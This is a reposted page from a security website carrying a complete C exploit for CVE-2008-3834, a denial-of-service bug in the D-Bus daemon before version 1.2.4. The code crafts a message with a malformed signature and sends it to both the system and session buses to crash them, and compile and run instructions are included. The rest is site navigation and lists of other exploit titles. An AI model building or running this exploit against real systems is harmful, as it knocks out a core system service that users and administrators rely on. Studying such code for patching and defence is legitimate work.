首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2009-01-20  
/*
* cve-2008-3834.c
*
* D-Bus Daemon Denial of Service < 1.2.4
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
*   $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834
*   $ ./cve-2008-3834

* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834
*
*   The dbus_signature_validate function in the D-bus library (libdbus)
*   before 1.2.4 allows remote attackers to cause a denial of service
*   (application abort) via a message containing a malformed signature,
*   which triggers a failed assertion error.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <dbus/dbus.h>

#define DEST "org.freedesktop.ExampleService"
#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"
#define PATH "/org/freedesktop/sample/object/name"
#define SIGNAL "ExampleMethod"

int
main(int argc, char *argv[])
{
char sig[8];
uint32_t val = 0xdeadbeef;
DBusMessage *message;
DBusConnection *system, *session;
DBusMessageIter iter1, iter2, iter3, iter4;

printf("[+] creating malicious dbus message...\n");

message = dbus_message_new_signal(PATH, NAME, SIGNAL);
if (!message) {
printf("[-] error: could not create dbus message\n");
return 1;
}
if (!dbus_message_set_destination(message, DEST)) {
printf("[-] error: could not create set dbus destination\n");
return 1;
}

sig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;
sig[1] = DBUS_STRUCT_BEGIN_CHAR;
sig[2] = DBUS_TYPE_INT32;
sig[3] = DBUS_TYPE_INT32;
sig[4] = DBUS_STRUCT_END_CHAR;
sig[5] = DBUS_TYPE_INT32;
sig[6] = DBUS_DICT_ENTRY_END_CHAR;
sig[7] = '\0';

dbus_message_iter_init_append(message, &iter1);
dbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);
dbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);
dbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);
dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
dbus_message_iter_close_container(&iter3, &iter4);
dbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);
dbus_message_iter_close_container(&iter2, &iter3);
dbus_message_iter_close_container(&iter1, &iter2);

printf("[+] connecting to dbus system daemon...\n");

system = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);

if (system) {
printf("[+] killing dbus system daemon...\n");

dbus_connection_send(system, message, NULL);
dbus_connection_flush(system);
dbus_connection_unref(system);
} else {
printf("[-] error: could not connect to dbus system daemon\n");
}

printf("[+] connecting to dbus session daemon...\n");

session = dbus_bus_get(DBUS_BUS_SESSION, NULL);

if (session) {
printf("[+] killing dbus session daemon...\n");

dbus_connection_send(session, message, NULL);
dbus_connection_flush(session);
dbus_connection_unref(session);
} else {
printf("[-] error: could not connect to dbus session daemon\n");
}

dbus_message_unref(message);

return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fhimage 1.2.1 Remote Command E
·QNX 6.4.0 bitflipped elf binar
·Fhimage 1.2.1 Remote Index Cha
·Joomla com_pccookbook (recipe_
·OTSTurntables 1.00.027 (.ofl)
·SmartVmd ActiveX v 1.1 Remote
·Sagem Router F@ST 2404 Remote
·SmartVmd ActiveX v 1.1 Remote
·MPlayer 1.0rc2 TwinVQ Stack Bu
·Ninja Blog 4.8 Remote Informat
·linux/x86 PUSH reboot() - 30 b
·Joomla com_waticketsystem Blin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved